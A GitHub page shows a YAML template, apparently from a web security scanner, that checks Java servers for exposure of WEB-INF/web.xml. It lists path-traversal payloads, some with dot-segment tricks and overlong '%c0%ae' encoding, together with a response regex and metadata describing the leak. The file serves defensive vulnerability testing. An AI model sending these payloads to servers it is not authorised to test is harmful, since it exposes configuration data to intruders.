forked from wallarm/fast-detects
-
Notifications
You must be signed in to change notification settings - Fork 0
/
java-web-inf-parameter.yaml
36 lines (34 loc) · 1012 Bytes
/
java-web-inf-parameter.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
generate:
- payload:
- "WEB-INF/web.xml"
- "WEB-INF/./web.xml"
- "WEB-INF/.../web.xml"
- "WEB-INF/././web.xml"
- "WEB-INF/../../WEB-INF/web.xml"
- "WEB-INF/../../../WEB-INF/web.xml"
- "WEB-INF/./xxx/../web.xml"
- "WEB-INF/./xxx/yyy/../../web.xml"
- "../WEB-INF/web.xml"
- "../../../../WEB-INF/web.xml"
- "../../WEB-INF/web.xml"
- "../WEB-INF/web.xml;x="
- "../../WEB-INF/web.xml;x="
- "../../../WEB-INF/web.xml;x="
- "%c0%ae/WEB-INF/web.xml"
- "%c0%ae/%c0%ae/WEB-INF/web.xml"
- "%c0%ae/%c0%ae/%c0%ae/WEB-INF/web.xml"
detect:
- response:
- body: '<web-app[\w\W]+<\/web-app>'
meta-info:
- title: "Java web.xml information leakage vulnerability"
- description: "WEB-INF directory may be accessed by external users because of improper configuration, resulting in the leakage of configuration information."
- type: info
- threat: 20
- tags:
- Information Exposure
- Java
- web-inf
- tomcat
- JBoss
- J2EE